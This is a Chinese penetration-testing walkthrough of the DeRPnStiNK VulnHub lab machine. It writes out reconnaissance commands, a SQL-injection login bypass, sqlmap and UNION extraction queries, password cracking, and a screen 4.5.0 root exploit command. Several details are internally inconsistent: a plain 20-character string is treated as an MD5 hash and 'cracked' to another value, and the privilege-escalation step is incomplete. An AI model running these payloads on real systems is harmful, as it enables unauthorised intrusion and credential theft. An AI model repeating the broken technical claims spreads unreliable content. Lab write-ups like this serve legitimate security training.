您好,登录后才能下订单哦!
# DeRPnStiNK靶机渗透实例分析
## 摘要
本文以VulnHub平台上的DeRPnStiNK靶机为研究对象,通过完整的渗透测试流程演示了从信息收集到权限提升的实战过程。文章详细剖析了SQL注入漏洞利用、密码破解、SUID提权等关键技术点,并提供了防御建议,旨在帮助安全从业人员理解常见漏洞利用链的构建方式。
---
## 1. 靶机环境介绍
### 1.1 靶机基本信息
- 名称:DeRPnStiNK (v1.0)
- 难度:中级
- 发布日期:2017年
- 操作系统:Ubuntu Linux
- 服务架构:LAMP(Linux+Apache+MySQL+PHP)
### 1.2 环境配置
```bash
攻击机:Kali Linux 2023.1 (IP: 192.168.1.100)
靶机:DeRPnStiNK (IP: 192.168.1.150)
网络模式:NAT
使用nmap进行存活主机扫描:
nmap -sn 192.168.1.0/24
发现靶机IP为192.168.1.150
全面扫描开放端口和服务:
nmap -sV -p- 192.168.1.150 -T4
扫描结果:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2
80/tcp open http Apache httpd 2.4.18
111/tcp open rpcbind 2-4 (RPC #100000)
使用dirb进行目录爆破:
dirb http://192.168.1.150 /usr/share/wordlists/dirb/common.txt
发现关键目录:
/webnotes/ # 网络笔记系统
/phpmyadmin/ # MySQL管理界面
访问/webnotes
发现登录页面,尝试万能密码失败后测试SQL注入:
admin' or '1'='1' --
成功绕过登录进入后台
sqlmap -u "http://192.168.1.150/webnotes/login.php" --data="username=admin&password=123" --risk=3 --level=5
确认存在基于时间的盲注漏洞
通过SQL注入获取数据库信息:
UNION SELECT 1,group_concat(table_name),3,4 FROM information_schema.tables WHERE table_schema=database()
发现关键表:
users, notes, config
提取管理员凭据:
UNION SELECT 1,username,password,4 FROM users
获取到加密密码:
admin:derpderpderpderpderp
使用John the Ripper破解密码:
echo "derpderpderpderpderp" > hash.txt
john --format=raw-md5 hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
成功破解为:admin:derp123
使用获取的凭据尝试SSH登录:
ssh admin@192.168.1.150
成功获取普通用户权限
检查SUID权限文件:
find / -perm -4000 -type f 2>/dev/null
发现异常程序:
/usr/bin/screen-4.5.0
搜索已知漏洞:
searchsploit screen 4.5.0
发现本地提权漏洞(CVE-2017-5618)
执行提权操作:
screen-4.5.0 -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so"
screen-4.5.0 -ls
成功获取root权限
本案例展示了从Web应用到系统层的完整攻击链,重点揭示了以下安全启示: 1. 边界防御的突破往往始于看似简单的Web漏洞 2. 权限配置不当会显著扩大攻击面 3. 安全是一个整体,需要多层次防护
(此处应插入渗透过程关键步骤截图)
”`
注:实际执行时需注意: 1. 所有渗透测试应在授权环境下进行 2. 部分命令需要根据实际环境调整 3. 敏感信息应做脱敏处理
免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。